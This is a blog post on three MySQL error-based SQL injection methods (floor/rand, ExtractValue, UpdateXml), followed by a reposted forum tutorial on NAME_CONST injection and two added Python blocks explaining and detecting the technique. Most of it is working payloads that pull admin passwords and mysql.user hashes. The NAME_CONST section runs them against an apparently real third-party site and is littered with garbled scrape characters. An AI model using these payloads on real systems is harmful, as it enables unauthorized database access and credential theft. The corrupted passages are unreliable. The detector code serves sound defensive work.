MySQL: three error-based injection methods (floor, ExtractValue, UpdateXml)

Posted on 2015-11-11 19:03:37

1. Error via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

For example, first run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id input is injectable, the following statement can be used to trigger an error.

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is successfully disclosed in the error message. To query other data, replace the version() expression with the desired query.
For example, to retrieve the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
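Added example, not from the post: a Python model of why the floor(rand(0)*2) GROUP BY query in method 1 ends in ERROR 1062. It reproduces MySQL's rand() generator (the rand(N) seeding and the my_rnd() recurrence from the server source) together with the double evaluation of the GROUP BY key; the prefix string and row counts are constructed inputs. Whatever is concatenated in front of the 0/1 lands verbatim in the error text, which is why returning a generic error page instead of the DBMS message removes this oracle even where the injection itself remains.

```python
MAX_VALUE = 0x3FFFFFFF  # rand_st->max_value in MySQL


class MySQLRand:
    """Replica of MySQL's my_rnd() generator, seeded the way rand(N) seeds it."""

    def __init__(self, n: int) -> None:
        # seed_random(): seed1 = N*0x10001 + 55555555, seed2 = N*0x10000001 (uint32)
        self.seed1 = ((n * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((n * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0_sequence(count: int) -> list:
    """First `count` values of floor(rand(0)*2) inside one statement: 0,1,1,0,1,..."""
    rng = MySQLRand(0)
    return [int(rng.next() * 2) for _ in range(count)]


def simulate_group_by(prefix: str, rows: int):
    """Emulate `select count(*), concat(prefix, floor(rand(0)*2)) x ... group by x`
    over `rows` input rows (constructed prefix, e.g. a version string).

    MySQL evaluates the GROUP BY key once to look the group up in its temporary
    table and again when it must insert a new group, so the key that is inserted
    is not the key that was looked up. Returns (groups, None) on success or
    (groups, error_text) when the insert collides with an existing group.
    """
    rng = MySQLRand(0)
    groups = {}
    for _ in range(rows):
        key = prefix + str(int(rng.next() * 2))  # evaluated for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = prefix + str(int(rng.next() * 2))  # re-evaluated for the insert
        if key in groups:  # row 3: lookup yields ...0, insert yields ...1 again
            return groups, "ERROR 1062 (23000): Duplicate entry '%s' for key 'group_key'" % key
        groups[key] = 1
    return groups, None
```

The collision needs at least three rows in the FROM clause, which is why the payloads use information_schema.tables or a three-row UNION as the row source.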

Further collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
9 i- H: P) _( x) e) p" c7 H( g4 z3 j- C  N0 e! ?' W" I# ^
Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--


VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

- g, t# u  q& d. f) s" u1 Z0 n5 u: C" R7 n3 N, ]+ b) X
0 A1 s, ~# i. K/ @6 K0 g0 K
: E0 Y$ @5 C, _! b
. T5 i/ p' y4 w0 Y4 [; P

) G# w7 F8 s5 Y( D0 Y( RNow let's get the tables out this bitch..$ E( h4 s/ |% |$ x' }$ m
" x- o4 _6 ]7 k! f' A/ Z
Code:
1 |2 x+ M; ?' ~  Y) w  D+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

5 P& t8 d7 I1 J0 z
: H, s3 A' `- T. v5 ]' OSo mine looks like this...
4 y8 t) s. ^! M, x7 i% t' \. g3 @
Code:
; S* D' z$ N) f) U' Mhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--, c) Y) o# k: I4 p% B: Y: k& M2 P% p8 ?
& S' Y$ A! w3 s0 K) v5 P
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
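As an added example that is not part of the post, the following Python detector flags the four error-based signatures collected on this page (floor/rand GROUP BY, extractvalue, updatexml, name_const) in Combined Log Format access logs; the log lines and addresses are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# One pattern per technique shown on this page; matched against the decoded, lower-cased path.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "name_const": re.compile(r"\bname_const\s*\("),
}

# Combined Log Format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def normalize(path: str) -> str:
    """Decode twice so double-encoded payloads (%2520) are seen, then lower-case."""
    return unquote_plus(unquote_plus(path)).lower()


def classify(line: str):
    """Return (ip, [matching technique names]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = normalize(m.group("path"))
    return m.group("ip"), [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(lines):
    """Group detections by source IP; lines with no signature hit are dropped."""
    report = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            report.setdefault(parsed[0], []).extend(parsed[1])
    return report


# Constructed sample log (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Nov/2015:19:04:01 +0800] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 231',
    '198.51.100.7 - - [11/Nov/2015:19:04:09 +0800] "GET /article.php?id=1%2520and%2520extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 198',
    '198.51.100.7 - - [11/Nov/2015:19:04:15 +0800] "GET /article.php?id=1+and+1=(updatexml(1,concat(0x3a,user()),1)) HTTP/1.1" 500 190',
    '198.51.100.7 - - [11/Nov/2015:19:04:22 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 220',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, hits)
```

Such a rule is a compensating control only: the fix is parameterised queries, and returning a generic error page instead of the DBMS message removes the channel all four techniques depend on.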
